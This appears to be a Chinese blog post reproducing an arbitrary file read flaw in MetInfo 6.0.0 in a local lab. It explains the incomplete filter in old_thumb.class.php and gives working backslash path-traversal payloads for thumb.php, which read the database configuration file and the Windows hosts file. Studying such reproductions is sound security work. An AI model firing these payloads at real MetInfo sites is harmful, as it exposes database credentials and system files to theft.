Metinfo6.0.0任意文件读取漏洞复现

漏洞原理

在\MetInfo6.0.0\app\system\include\module\的old_thumb.class.php文件

Metinfo6.0.0任意文件读取漏洞复现_第1张图片

可以看到这里对./进行了严格的过滤,但是却忽略了在Windows下还可以用…\来跳转目录

环境搭建

下载Metinfo6.0.0

Metinfo6.0.0任意文件读取漏洞复现_第2张图片

Metinfo6.0.0任意文件读取漏洞复现_第3张图片

Metinfo6.0.0任意文件读取漏洞复现_第4张图片

配置随便写,自己记住就行

Metinfo6.0.0任意文件读取漏洞复现_第5张图片

这里前面已经审计过代码了,就直接上payload了

http://10.9.75.161/MetInfo6.0.0/include/thumb.php?dir=http\..\..\config\config_db.php

Metinfo6.0.0任意文件读取漏洞复现_第6张图片

还可以访问其他文件

..\..\..\..\..\Windows\System32\drivers\etc\hosts

Metinfo6.0.0任意文件读取漏洞复现_第7张图片

你可能感兴趣的:(网络安全)